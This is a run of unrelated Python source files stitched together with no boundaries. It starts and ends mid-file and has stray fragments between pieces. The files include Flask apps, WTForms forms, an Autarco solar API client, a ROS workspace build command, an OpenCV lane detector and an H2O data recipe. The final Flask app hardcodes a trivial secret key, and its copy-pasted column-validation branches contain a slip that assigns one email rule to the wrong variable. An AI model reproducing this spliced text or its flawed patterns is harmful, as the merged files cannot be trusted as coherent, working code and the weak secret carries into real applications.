int(input()) combinations = 0 is_found = False for x1 in range(start, end + 1): for x2 in range(start, end +1): combinations += 1 if x1 + x2 == magick_num: print(f"Combination N:{combinations} ({x1} + {x2} = {magick_num})") is_found = True break if is_found: break if not is_found: print(f'{combinations} combinations - neither equals {magick_num}')app.py # -*- coding: utf-8 -*- from __future__ import absolute_import from flask import Flask from flask_assets import Environment, Bundle import logging from logging.handlers import RotatingFileHandler from platus.web import web from platus.api import api from platus.config import config application = Flask(__name__,\ static_folder="platus/static/",\ template_folder="platus/templates/", static_url_path="/static") application.register_blueprint(web) application.register_blueprint(api) application.config.update(config.from_yaml("data/config.yaml")) # Scss assets = Environment(application) assets.versions = 'timestamp' assets.url_expire = True assets.manifest = 'file:/tmp/manifest.to-be-deployed' # explict filename assets.cache = False assets.auto_build = True assets.url = application.static_url_path scss = Bundle('scss/00_main.scss', filters='pyscss', output='css/main.css', depends=['scss/*.scss']) assets.register('scss_all', scss) assets.debug = False application.config['ASSETS_DEBUG'] = False # Set Logger log_levels = { "info": logging.INFO, "debug": logging.DEBUG, "error": logging.ERROR, "critical": logging.CRITICAL } log_level = log_levels[application.config.get("log_level", "info")] log = logging.getLogger(__name__) console_formatter = logging.Formatter( '%(levelname)s\t%(filename)s:%(lineno)d\t\t%(message)s', '%m-%d %H:%M:%S') file_formatter = logging.Formatter( '%(levelname)s - %(asctime)s - %(pathname)s - %(lineno)d - %(message)s', '%m-%d %H:%M:%S') console_handler = logging.StreamHandler() console_handler.setLevel(log_level) console_handler.setFormatter(console_formatter) rotatingfile_handler = RotatingFileHandler('platus.log', maxBytes=10000, backupCount=1) rotatingfile_handler.setLevel(log_level) rotatingfile_handler.setFormatter(file_formatter) application.logger.addHandler(console_handler) application.logger.addHandler(rotatingfile_handler) application.logger.setLevel(log_level) if __name__ == '__main__': application.run(host="0.0.0.0", port=5001) from flask_wtf import FlaskForm from wtforms import StringField, PasswordField, BooleanField, SubmitField from wtforms.validators import Required, Email, EqualTo, Length from models.user import User from wtforms import ValidationError class LoginForm(FlaskForm): ''' Class to create a login form ''' email = StringField('Email address', validators=[Required(),Email()]) password = PasswordField('Password', validators=[Required()]) remember = BooleanField('Remember me') submit = SubmitField('Sign in') class RegistrationForm(FlaskForm): ''' Class to create a registration form ,render_kw={'class':'btn-submit'} ''' first_name = StringField("First name", validators=[Required()]) other_names = StringField("Other names", validators=[Required()]) username = StringField("Enter your username", validators=[Required()]) email = StringField("Your Email Address", validators=[Required(), Email()]) password = PasswordField("Password", validators=[Required(),Length(min=8, max=80), EqualTo( 'password_confirm', message="Passwords must match")]) password_confirm = PasswordField( "", validators=[Required()]) submit = SubmitField('Sign Up') def validate_email(self, data_field): ''' Method to confirm if there is no user registered with that email address Args: data_field: email Return: validation error if user exists ''' if User.query.filter_by(email=data_field.data).first(): raise ValidationError('Email exists!') def validate_username(self, data_field): ''' Method to confirm if username is unique and raise validation error if another user has the same username Args: data_field:username Return: validation error if user exists ''' if User.query.filter_by(username=data_field.data).first(): raise ValidationError('That username is taken!') klaasnicolaas/python-autarco """Asynchronous Python client for Autarco API.""" from __future__ import annotations import asyncio import socket from dataclasses import dataclass from importlib import metadata from typing import Any import aiohttp import async_timeout from aiohttp.client import ClientError, ClientResponseError, ClientSession from aiohttp.hdrs import METH_GET from yarl import URL from .exceptions import ( AutarcoAuthenticationError, AutarcoConnectionError, AutarcoConnectionTimeoutError, AutarcoError, ) from .models import Account, Inverter, Solar @dataclass class Autarco: """Main class for handling connections to Autarco.""" email: str password: str request_timeout: float = 10.0 session: ClientSession | None = None _close_session: bool = False async def _request( self, uri: str, *, method: str = METH_GET, data: dict[str, Any] | None = None, ) -> Any: """Handle a request to the Autarco API. A generic method for sending/handling HTTP requests done against the Autarco API. Args: uri: Request URI, without '/', for example, 'status'. method: HTTP method to use. data: Dictionary of data send to the Autarco API. Returns: The response data from the Autarco API. Raises: AutarcoAuthenticationError: If the email or password is invalid. AutarcoConnectionError: An error occurred while communicating with the Autarco API. AutarcoConnectionTimeoutError: A timeout occurred while communicating with the Autarco API. AutarcoError: Received an unexpected response from the Autarco API. """ version = metadata.version(__package__) url = URL.build(scheme="https", host="my.autarco.com", path="/api/site/").join( URL(uri) ) headers = { "Accept": "application/json", "User-Agent": f"PythonAutarco/{version}", } if self.session is None: self.session = ClientSession() self._close_session = True # Set basic auth credentials. auth = aiohttp.BasicAuth(self.email, self.password) try: async with async_timeout.timeout(self.request_timeout): response = await self.session.request( method, url, auth=auth, headers=headers, json=data, ssl=True, ) response.raise_for_status() except asyncio.TimeoutError as exception: raise AutarcoConnectionTimeoutError( "Timeout occurred while connecting to Autarco API" ) from exception except ClientResponseError as exception: if exception.status == 401: raise AutarcoAuthenticationError( "Authentication to the Autarco API failed" ) from exception raise AutarcoConnectionError( "Error occurred while connecting to the Autarco API" ) from exception except (ClientError, socket.gaierror) as exception: raise AutarcoConnectionError( "Error occurred while communicating with the Autarco API" ) from exception content_type = response.headers.get("Content-Type", "") if "application/json" not in content_type: text = await response.text() raise AutarcoError( "Unexpected response from the Autarco API", {"Content-Type": content_type, "response": text}, ) response_data: dict[str, Any] = await response.json(content_type=None) return response_data async def get_public_key(self) -> str: """Get the public key. Returns: The public key as string. """ data = await self._request("") key: str = data[0]["public_key"] return key async def all_inverters(self, public_key: str) -> dict[str, Inverter]: """Get a list of all used inverters. Args: public_key: The public key from your account. Returns: A list of Inverter objects. """ results: dict[str, Any] = {} data = await self._request(f"{public_key}/power") for number, item in enumerate(data["inverters"].items(), 1): inverter = Inverter.from_json(item) results[f"Inverter {number}"] = inverter return results async def solar(self, public_key: str) -> Solar: """Get information about the solar production. Args: public_key: The public key from your account. Returns: An Solar object. """ data = await self._request(f"{public_key}/") return Solar.from_json(data) async def account(self, public_key: str) -> Account: """Get information about your account. Args: public_key: The public key from your account. Returns: An Account object. """ data = await self._request(f"{public_key}/") return Account.from_json(data) async def close(self) -> None: """Close open client session.""" if self.session and self._close_session: await self.session.close() async def __aenter__(self) -> Autarco: """Async enter. Returns: The Autarco object. """ return self async def __aexit__(self, *_exc_info: Any) -> None: """Async exit. Args: _exc_info: Exec type. """ await self.close() 1-10 # coding=utf-8 # # ROSREPO # Manage ROS workspaces with multiple Gitlab repositories # # Author: # # Copyright 2016 # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # # import os from .workspace import find_ros_root, get_workspace_location, get_workspace_state, resolve_this, WSFL_WS_PACKAGES from .cmd_git import clone_packages from .resolver import find_dependees, resolve_system_depends from .config import Config from .cache import Cache from .ui import msg, warning, error, fatal, show_conflicts, show_missing_system_depends from .util import call_process, find_program, iteritems, getmtime, PIPE, env_path_list_contains, \ run_multiprocess_workers from functools import reduce def run(args): wsdir = get_workspace_location(args.workspace) config = Config(wsdir) cache = Cache(wsdir) if args.offline is None: args.offline = config.get("offline_mode", False) if args.offline: warning("offline mode. Run 'rosrepo config --online' to disable\n") ros_rootdir = find_ros_root(config.get("ros_root", None)) if ros_rootdir is None: fatal("cannot detect ROS distribution. Have you sourced your setup.bash?\n") config.set_default("default_build", []) config.set_default("pinned_build", []) config.set_default("last_build", []) config.set_default("last_ros_root", ros_rootdir) if config["last_ros_root"] != ros_rootdir and not args.clean_all: msg( "You have changed your ROS distribution from " "@{cf}%(old_path)s@| to @{cf}%(new_path)s@|. Please run\n\n" " @!rosrepo clean@|\n\n" "to remove all obsolete build artifacts and rebuild your workspace with " "the new ROS version.\n\n" % {"old_path": config["last_ros_root"], "new_path": ros_rootdir} ) fatal("need to clean workspace") ws_state = get_workspace_state(wsdir, config, cache, offline_mode=args.offline) if args.last: args.packages = config["last_build"] if args.this: args.packages = resolve_this(wsdir, ws_state) if args.all: args.packages = ws_state.ws_packages.keys() if args.rebuild: args.packages = [pkg for pkg in ws_state.ws_packages.keys() if os.path.isfile(os.path.join(wsdir, "build", pkg, "Makefile"))] if args.set_default: if args.packages: msg("@{cf}Replacing default build set with@|:\n") msg(", ".join(sorted(args.packages)) + "\n\n", indent=4) else: fatal("no packages given for new default build\n") config["default_build"] = sorted(args.packages) if args.set_pinned: if args.packages: msg("@{cf}Replacing pinned build set with@|:\n") msg(", ".join(sorted(args.packages)) + "\n\n", indent=4) else: fatal("no packages given to be pinned\n") config["pinned_build"] = sorted(args.packages) srcdir = os.path.join(wsdir, "src") pinned_set = set(config["pinned_build"]) if args.packages: build_set = set(args.packages) if build_set: msg("@{cf}You selected the following packages to be built@|:\n") msg(", ".join(sorted(list(build_set))) + "\n\n", indent=4) else: build_set = set(config["default_build"]) if build_set: msg("@{cf}The following packages are included in the default build@|:\n") msg(", ".join(sorted(list(build_set))) + "\n\n", indent=4) if pinned_set - build_set: if build_set: msg("@{cf}The following pinned packages will also be built@|:\n") else: msg("@{cf}The following pinned packages will be built@|:\n") msg(", ".join(sorted(list(pinned_set - build_set))) + "\n\n", indent=4) config["last_build"] = list(build_set) clean_set = build_set.copy() build_set |= pinned_set if not build_set: fatal("no packages to build\n") build_packages, system_depends, conflicts = find_dependees(build_set, ws_state) show_conflicts(conflicts) if conflicts: fatal("cannot resolve dependencies\n") clean_packages, _, _ = find_dependees(clean_set, ws_state, auto_resolve=True, ignore_missing=True) clean_packages = set(clean_packages.keys()) & set(ws_state.ws_packages.keys()) if not args.dry_run: config.write() depend_set = set(build_packages.keys()) - build_set if depend_set: msg("@{cf}The following additional packages are needed to satisfy dependencies@|:\n") msg(", ".join(sorted(depend_set)) + "\n\n", indent=4) if system_depends: msg("@{cf}The following system packages are needed to satisfy dependencies@|:\n") msg(", ".join(sorted(system_depends)) + "\n\n", indent=4) missing = resolve_system_depends(ws_state, system_depends, missing_only=True) show_missing_system_depends(missing) if missing and not args.ignore_missing_depends: fatal("missing system packages (use -m/--ignore-missing-depends) to build anyway)\n") if args.clone: clone_packages(srcdir, build_packages, ws_state, config, protocol=args.protocol or config.get("git_default_transport", "ssh"), offline_mode=args.offline, dry_run=args.dry_run) ws_state = get_workspace_state(wsdir, config, cache, offline_mode=args.offline, ws_state=ws_state, flags=WSFL_WS_PACKAGES) build_packages, _, conflicts = find_dependees(build_set, ws_state) show_conflicts(conflicts) assert not conflicts missing_ws = [n for n in build_packages if n not in ws_state.ws_packages] if missing_ws and not args.dry_run: msg("@{cf}The following packages are missing from your workspace@|:\n") msg(", ".join(sorted(missing_ws)) + "\n\n", indent=4) fatal("missing build dependencies\n") if config["last_ros_root"] != ros_rootdir and not args.dry_run: invoke = ["catkin", "config", "--extend", ros_rootdir] call_process(invoke, stdout=PIPE, stderr=PIPE) config["last_ros_root"] = ros_rootdir config.write() if args.clean_all: invoke = ["catkin", "clean", "--workspace", wsdir, "--yes", "--all"] if args.dry_run: invoke += ["--dry-run"] call_process(invoke) elif args.clean: invoke = ["catkin", "clean", "--workspace", wsdir, "--yes"] if args.dry_run: invoke += ["--dry-run"] invoke += list(clean_packages) call_process(invoke) catkin_lint = find_program("catkin_lint") if args.catkin_lint is None: args.catkin_lint = config.get("use_catkin_lint", True) if catkin_lint and args.catkin_lint: skip_catkin_lint = set(config.get("skip_catkin_lint", [])) & set(build_packages.keys()) catkin_lint = [catkin_lint, "--package-path", srcdir] if args.offline: catkin_lint += ["--offline"] catkin_lint += reduce(lambda x, y: x + y, (["--pkg", pkg] for pkg in build_packages.keys())) if skip_catkin_lint: catkin_lint += reduce(lambda x, y: x + y, (["--skip", pkg] for pkg in skip_catkin_lint)) msg("@{cf}Running catkin_lint@|\n") ret = call_process(catkin_lint) for pkg in skip_catkin_lint: warning("skipped catkin_lint for package '%s'\n" % pkg) if ret != 0 and not args.dry_run: fatal("catkin_lint reported errors\n") catkin_build = ["catkin", "build", "--workspace", wsdir] if args.dry_run: catkin_build += ["--dry-run"] if args.verbose: catkin_build += ["--verbose"] if args.no_status: catkin_build += ["--no-status"] if args.keep_going: catkin_build += ["--continue-on-failure"] if args.env_cache is None: args.env_cache = config.get("use_env_cache", True) if args.env_cache: catkin_build += ["--env-cache"] else: catkin_build += ["--no-env-cache"] if args.jobs: jobs = int(args.jobs) if jobs > 0: catkin_build += ["-j", str(args.jobs), "-p", str(args.jobs)] else: jobs = None elif "job_limit" in config: jobs = int(config["job_limit"]) catkin_build += ["-j", str(config["job_limit"]), "-p", str(config["job_limit"])] else: jobs = None catkin_build += build_packages.keys() if args.verbose: catkin_build += ["--make-args", "VERBOSE=ON"] ret = call_process(catkin_build) rosclipse = find_program("rosclipse") use_rosclipse = args.rosclipse or (args.rosclipse is None and config.get("use_rosclipse", True)) force_rosclipse = args.rosclipse if rosclipse is not None and use_rosclipse: eclipse_ok, _, _ = call_process([rosclipse, "-d"], stdout=PIPE, stderr=PIPE) if eclipse_ok == 0: workload = [] for name, pkg in iteritems(build_packages): if not pkg.manifest.is_metapackage() and hasattr(pkg, "workspace_path") and pkg.workspace_path is not None: pkgdir = os.path.join(wsdir, "src", pkg.workspace_path) p_time = max(getmtime(os.path.join(pkgdir, "CMakeLists.txt")), getmtime(os.path.join(pkgdir, "package.xml"))) e_time = getmtime(os.path.join(pkgdir, ".project")) if e_time < p_time or force_rosclipse: workload.append((wsdir, rosclipse, name, args.dry_run)) run_multiprocess_workers(update_rosclipse, workload, jobs=jobs) if os.path.isdir(os.path.join(wsdir, "devel", "bin")) and not env_path_list_contains("PATH", os.path.join(wsdir, "devel", "bin")): warning("%s is not in PATH\n" % os.path.join(wsdir, "devel", "bin")) msg("You probably need to source @{cf}%s@| again (or close and re-open your terminal)\n\n" % os.path.join(wsdir, "devel", "setup.bash")) if not env_path_list_contains("ROS_PACKAGE_PATH", os.path.join(wsdir, "src")): for name, pkg in iteritems(build_packages): if not pkg.manifest.is_metapackage() and hasattr(pkg, "workspace_path") and pkg.workspace_path is not None: pkgdir = os.path.join(wsdir, "src", pkg.workspace_path) if not env_path_list_contains("ROS_PACKAGE_PATH", pkgdir): warning("%s is not in ROS_PACKAGE_PATH\n" % pkgdir) msg("You probably need to source @{cf}%s@| again (or close and re-open your terminal)\n\n" % os.path.join(wsdir, "devel", "setup.bash")) return ret def update_rosclipse(part): wsdir, rosclipse, name, dry_run = part[0], part[1], part[2], part[3] msg("@{cf}Updating rosclipse project files@|: %s\n" % name) if not dry_run: result, catkin_env, _ = call_process(["catkin", "build", "--workspace", wsdir, "--get-env", name], stdout=PIPE) if result != 0: error("%s: failed to setup environment\n" % name) return result, _, _ = call_process(["catkin", "env", "-i", "--stdin", rosclipse, name], input_data=catkin_env, stdin=PIPE) if result != 0: error("%s: failed to update rosclipse project files\n" % name) import cv2 import numpy as np def draw_the_lines(image, lines): lines_image = np.zeros(shape=(image.shape[0], image.shape[1], 3), dtype=np.uint8) for line in lines: for x1, y1, x2, y2 in line: cv2.line(lines_image, (x1, y1), (x2, y2), (255,0,0), thickness=3) image_with_lines = cv2.addWeighted(image, 0.8, lines_image, 1, 0.0) return image_with_lines def region_of_interest(image, region_points): mask = np.zeros_like(image) cv2.fillPoly(mask, region_points, 255) masked_image = cv2.bitwise_and(image, mask) return masked_image def get_detect_lanes(image, filter='laplacian'): height, width, _ = image.shape grayscale_image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY) if filter.lower() == 'laplacian': edge_kernel = np.array([ [0, 1, 0], [1, -4, 1], [0 ,1, 0] ]) result_image = cv2.filter2D(grayscale_image, -1, edge_kernel) elif filter.lower() == 'canny': result_image = cv2.Canny(grayscale_image, 70, 100) region_of_interest_verties = [ [0, height], [width/2, height*0.6], [width, height] ] cropped_image = region_of_interest(result_image, np.array([region_of_interest_verties], np.int32)) lines = cv2.HoughLinesP(cropped_image, rho=2, theta=np.pi/ 180, threshold=50, lines=np.array([]), minLineLength=40, maxLineGap=150) image_with_lines = draw_the_lines(image, lines) return image_with_lines video = cv2.VideoCapture('videos/lane_detection_video.mp4') while video.isOpened(): is_grabbed, frame = video.read() if not is_grabbed: break frame = get_detect_lanes(frame, 'canny') cv2.imshow("Lane Detection Video", frame) cv2.waitKey(20) video.release() cv2.destroyAllWindows()h2oai/driverlessai-recipes """Modify credit card dataset""" from typing import Union, List from h2oaicore.data import CustomData import datatable as dt import numpy as np import pandas as pd class CreditCardData(CustomData): @staticmethod def create_data(X: dt.Frame = None) -> Union[str, List[str], dt.Frame, List[dt.Frame], np.ndarray, List[np.ndarray], pd.DataFrame, List[pd.DataFrame]]: if X is None: return [] if 'default payment next month' in X.names: # e.g. train data X[:, 'default payment next month leak'] = X[:, 'default payment next month'] else: # e.g. test data without target, for testing purposes, ensure still CC dataset cc_names = ["AGE", "ID", "LIMIT_BAL", "SEX", "EDUCATION", "MARRIAGE", "PAY_0", "PAY_2", "PAY_3", "PAY_4", "PAY_5", "PAY_6", "BILL_AMT1", "BILL_AMT2", "BILL_AMT3", "BILL_AMT4", "BILL_AMT5", "BILL_AMT6", "PAY_AMT1", "PAY_AMT2", "PAY_AMT3", "PAY_AMT4", "PAY_AMT5", "PAY_AMT6"] assert all([x in cc_names for x in X.names]) return X 0 ''' from flask import Flask, render_template, request, flash import json app = Flask(name) @app.route('/') def home(): return render_template("index.html") @app.route('/login_1', methods=['GET', 'POST']) def login_func(): if request.method == 'POST': return redirect(url_for('index')) return render_template('login_1.html') if name == "main": app.run(debug=True) ''' from flask import Flask, render_template, request, flash, redirect, url_for import json import pandas as pd from io import StringIO from pandas_schema import Column, Schema from pandas_schema.validation import LeadingWhitespaceValidation, TrailingWhitespaceValidation, CanConvertValidation, MatchesPatternValidation, InRangeValidation, InListValidation, DateFormatValidation import os from werkzeug.utils import secure_filename import os import boto3 app = Flask(__name__) app.secret_key = "secret key" @app.route('/') def home(): return render_template("index.html") @app.route('/login', methods=['GET', 'POST']) def login_func(): if request.method == 'POST': return redirect(url_for('index')) return render_template('login.html') @app.route('/upload', methods=['GET', 'POST']) def upload_func(): if request.method == 'POST': return redirect(url_for('upload')) return render_template('upload.html') s3 = boto3.client('s3', aws_access_key_id = "", aws_secret_access_key = "" ) BUCKET_NAME='dell-hackathon' @app.route('/upload_aws',methods=['post']) def upload(): if request.method == 'POST': img = request.files['file'] if img: filename = secure_filename(img.filename) img.save(filename) s3.upload_file( Bucket = BUCKET_NAME, Filename=filename, Key = filename ) return render_template("upload.html") @app.route('/design', methods=['post', 'get']) def design(): if request.method == 'POST': values=0 if request.form.get('columns') == '1': a=request.form.get('columns') values=1 print(a) return render_template("design.html",value=a,values=values) count=1 if request.form.get('columns') == '2': a=request.form.get('columns') values=2 print(a) return render_template("design.html",value=a,values=values) if request.form.get('columns') == '3': a=request.form.get('columns') values=3 print(a) return render_template("design.html",value=a,values=values) if request.form.get('columns') == '4': a=request.form.get('columns') values=4 print(a) return render_template("design.html",value=a,values=values) if request.form.get('columns') == '5': a=request.form.get('columns') values=5 print(a) return render_template("design.html",value=a,values=values) #value = None cnum0 = request.form.get('cnum0') cnum1 = request.form.get('cnum1') cnum2 = request.form.get('cnum2') cnum3 = request.form.get('cnum3') cnum4 = request.form.get('cnum4') d0 = request.form.get('d0') d1 = request.form.get('d1') d2 = request.form.get('d2') d3 = request.form.get('d3') d4 = request.form.get('d4') c0="" c1="" c2="" c3="" c4="" if int(cnum1 or 123) is None: cnum1="" if int(cnum2 or 23) is None: cnum2="" if int(cnum3 or 23) is None: cnum3="" if int(cnum4 or 23) is None: cnum4="" if cnum4=='4': test_data = pd.read_csv('data-5.csv') if d0=='Age': c0=InRangeValidation(0, 110) if d0=='Name': c0=LeadingWhitespaceValidation() if d0=='Gender': c0=InListValidation(['Male', 'Female', 'Other', 'm','M','f','F','male','female','other']) if d0=='Phn': c0=MatchesPatternValidation(r'\d{10}') if d0=='E-mail': c0=MatchesPatternValidation(r'(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+$)') if d0=='Date': c0=MatchesPatternValidation(r"[\d]{1,2}/[\d]{1,2}/[\d]{4}") if d0=='Time': c0=MatchesPatternValidation(r"[\d]{1,2}:[\d]{2}") if d1=='Age': c1=InRangeValidation(0, 110) if d1=='Name': c1=LeadingWhitespaceValidation() if d1=='Gender': c1=InListValidation(['Male', 'Female', 'Other', 'm','M','f','F','male','female','other']) if d1=='Phn': c1=MatchesPatternValidation(r'\d{10}') if d1=='E-mail': c1=MatchesPatternValidation(r'(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+$)') if d1=='Date': c1=MatchesPatternValidation(r"[\d]{1,2}/[\d]{1,2}/[\d]{4}") if d1=='Time': c1=MatchesPatternValidation(r"[\d]{1,2}:[\d]{2}") if d2=='Age': c2=InRangeValidation(0, 110) if d2=='Name': c2=LeadingWhitespaceValidation() if d2=='Gender': c2=InListValidation(['Male', 'Female', 'Other', 'm','M','f','F','male','female','other']) if d2=='Phn': c2=MatchesPatternValidation(r'\d{10}') if d2=='E-mail': c2=MatchesPatternValidation(r'(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+$)') if d2=='Date': c2=MatchesPatternValidation(r"[\d]{1,2}/[\d]{1,2}/[\d]{4}") if d2=='Time': c2=MatchesPatternValidation(r"[\d]{1,2}:[\d]{2}") if d3=='Age': c3=InRangeValidation(0, 110) if d3=='Name': c3=LeadingWhitespaceValidation() if d3=='Gender': c3=InListValidation(['Male', 'Female', 'Other', 'm','M','f','F','male','female','other']) if d3=='Phn': c3=MatchesPatternValidation(r'\d{10}') if d3=='E-mail': c3=MatchesPatternValidation(r'(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+$)') if d3=='Date': c3=MatchesPatternValidation(r"[\d]{1,2}/[\d]{1,2}/[\d]{4}") if d3=='Time': c3=MatchesPatternValidation(r"[\d]{1,2}:[\d]{2}") if d4=='Age': c4=InRangeValidation(0, 110) if d4=='Name': c4=LeadingWhitespaceValidation() if d4=='Gender': c4=InListValidation(['Male', 'Female', 'Other', 'm','M','f','F','male','female','other']) if d4=='Phn': c4=MatchesPatternValidation(r'\d{10}') if d4=='E-mail': c4=MatchesPatternValidation(r'(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+$)') if d4=='Date': c4=MatchesPatternValidation(r"[\d]{1,2}/[\d]{1,2}/[\d]{4}") if d4=='Time': c4=MatchesPatternValidation(r"[\d]{1,2}:[\d]{2}") list=[] for col in test_data.columns: list.append(col) schema = Schema([Column(list[int(cnum0)], [c0]),Column(list[int(cnum1)], [c1]),Column(list[int(cnum2)], [c2]), Column(list[int(cnum3)], [c3]), Column(list[int(cnum4)], [c4]) ]) errors = schema.validate(test_data) for error in errors: print(error) pd.DataFrame({'col':errors}).to_csv('errors.csv') return redirect(url_for('design')) if cnum3=='3': test_data = pd.read_csv('data-4.csv') if d0=='Age': c0=InRangeValidation(0, 110) if d0=='Name': c0=LeadingWhitespaceValidation() if d0=='Gender': c0=InListValidation(['Male', 'Female', 'Other', 'm','M','f','F','male','female','other']) if d0=='Phn': c0=MatchesPatternValidation(r'\d{10}') if d0=='E-mail': c0=MatchesPatternValidation(r'(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+$)') if d0=='Date': c0=MatchesPatternValidation(r"[\d]{1,2}/[\d]{1,2}/[\d]{4}") if d0=='Time': c0=MatchesPatternValidation(r"[\d]{1,2}:[\d]{2}") if d1=='Age': c1=InRangeValidation(0, 110) if d1=='Name': c1=LeadingWhitespaceValidation() if d1=='Gender': c1=InListValidation(['Male', 'Female', 'Other', 'm','M','f','F','male','female','other']) if d1=='Phn': c1=MatchesPatternValidation(r'\d{10}') if d1=='E-mail': c1=MatchesPatternValidation(r'(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+$)') if d1=='Date': c1=MatchesPatternValidation(r"[\d]{1,2}/[\d]{1,2}/[\d]{4}") if d1=='Time': c1=MatchesPatternValidation(r"[\d]{1,2}:[\d]{2}") if d2=='Age': c2=InRangeValidation(0, 110) if d2=='Name': c2=LeadingWhitespaceValidation() if d2=='Gender': c2=InListValidation(['Male', 'Female', 'Other', 'm','M','f','F','male','female','other']) if d2=='Phn': c2=MatchesPatternValidation(r'\d{10}') if d2=='E-mail': c2=MatchesPatternValidation(r'(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+$)') if d2=='Date': c2=MatchesPatternValidation(r"[\d]{1,2}/[\d]{1,2}/[\d]{4}") if d2=='Time': c2=MatchesPatternValidation(r"[\d]{1,2}:[\d]{2}") if d3=='Age': c3=InRangeValidation(0, 110) if d3=='Name': c3=LeadingWhitespaceValidation() if d3=='Gender': c3=InListValidation(['Male', 'Female', 'Other', 'm','M','f','F','male','female','other']) if d3=='Phn': c3=MatchesPatternValidation(r'\d{10}') if d3=='E-mail': c3=MatchesPatternValidation(r'(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+$)') if d3=='Date': c3=MatchesPatternValidation(r"[\d]{1,2}/[\d]{1,2}/[\d]{4}") if d3=='Time': c3=MatchesPatternValidation(r"[\d]{1,2}:[\d]{2}") list=[] for col in test_data.columns: list.append(col) schema = Schema([Column(list[int(cnum0)], [c0]),Column(list[int(cnum1)], [c1]),Column(list[int(cnum2)], [c2]), Column(list[int(cnum3)], [c3]) ]) errors = schema.validate(test_data) for error in errors: print(error) pd.DataFrame({'col':errors}).to_csv('errors.csv') return redirect(url_for('design')) if cnum2=='2': test_data = pd.read_csv('data-3.csv') if d0=='Age': c0=InRangeValidation(0, 110) if d0=='Name': c0=LeadingWhitespaceValidation() if d0=='Gender': c0=InListValidation(['Male', 'Female', 'Other', 'm','M','f','F','male','female','other']) if d0=='Phn': c0=MatchesPatternValidation(r'\d{10}') if d0=='E-mail': c0=MatchesPatternValidation(r'(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+$)') if d0=='Date': c0=MatchesPatternValidation(r"[\d]{1,2}/[\d]{1,2}/[\d]{4}") if d0=='Time': c0=MatchesPatternValidation(r"[\d]{1,2}:[\d]{2}") if d1=='Age': c1=InRangeValidation(0, 110) if d1=='Name': c1=LeadingWhitespaceValidation() if d1=='Gender': c1=InListValidation(['Male', 'Female', 'Other', 'm','M','f','F','male','female','other']) if d1=='Phn': c1=MatchesPatternValidation(r'\d{10}') if d1=='E-mail': c1=MatchesPatternValidation(r'(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+$)') if d1=='Date': c1=MatchesPatternValidation(r"[\d]{1,2}/[\d]{1,2}/[\d]{4}") if d1=='Time': c1=MatchesPatternValidation(r"[\d]{1,2}:[\d]{2}") if d2=='Age': c2=InRangeValidation(0, 110) if d2=='Name': c2=LeadingWhitespaceValidation() if d2=='Gender': c2=InListValidation(['Male', 'Female', 'Other', 'm','M','f','F','male','female','other']) if d2=='Phn': c2=MatchesPatternValidation(r'\d{10}') if d2=='E-mail': c4=MatchesPatternValidation(r'(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+$)') if d2=='Date': c2=MatchesPatternValidation(r"[\d]{1,2}/[\d]{1,2}/[\d]{4}") if d2=='Time': c2=MatchesPatternValidation(r"[\d]{1,2}:[\d]{2}") list=[] for col in test_data.columns: list.append(col) schema = Schema([Column(list[int(cnum0)], [c0]),Column(list[int(cnum1)], [c1]),Column(list[int(cnum2)], [c2]) ]) errors = schema.validate(test_data) for error in errors: print(error) pd.DataFrame({'col':errors}).to_csv('errors.csv') return redirect(url_for('design')) elif cnum1=='1': test_data = pd.read_csv('data-2.csv') if d0=='Age': c0=InRangeValidation(0, 110) if d0=='Name': c0=LeadingWhitespaceValidation() if d0=='Gender': c0=InListValidation(['Male', 'Female', 'Other', 'm','M','f','F','male','female','other']) if d0=='Phn': c0=MatchesPatternValidation(r'\d{10}') if d0=='E-mail': c0=MatchesPatternValidation(r'(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+$)') if d0=='Date': c0=MatchesPatternValidation(r"[\d]{1,2}/[\d]{1,2}/[\d]{4}") if d0=='Time': c0=MatchesPatternValidation(r"[\d]{1,2}:[\d]{2}") if d1=='Age': c1=InRangeValidation(0, 110) if d1=='Name': c1=LeadingWhitespaceValidation() if d1=='Gender': c1=InListValidation(['Male', 'Female', 'Other', 'm','M','f','F','male','female','other']) if d1=='Phn': c1=MatchesPatternValidation(r'\d{10}') if d1=='E-mail': c1=MatchesPatternValidation(r'(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+$)') if d1=='Date': c1=MatchesPatternValidation(r"[\d]{1,2}/[\d]{1,2}/[\d]{4}") if d1=='Time': c1=MatchesPatternValidation(r"[\d]{1,2}:[\d]{2}") list=[] for col in test_data.columns: list.append(col) schema = Schema([Column(list[int(cnum0)], [c0]),Column(list[int(cnum1)], [c1]) ]) errors = schema.validate(test_data) for error in errors: print(error) pd.DataFrame({'col':errors}).to_csv('errors.csv') return redirect(url_for('design')) else: test_data = pd.read_csv('data-1.csv') if d0=='Age': c0=InRangeValidation(0, 110) if d0=='Name': c0=LeadingWhitespaceValidation() if d0=='Gender': c0=InListValidation(['Male', 'Female', 'Other', 'm','M','f','F','male','female','other']) if d0=='Phn': c0=MatchesPatternValidation(r'\d{10}') if 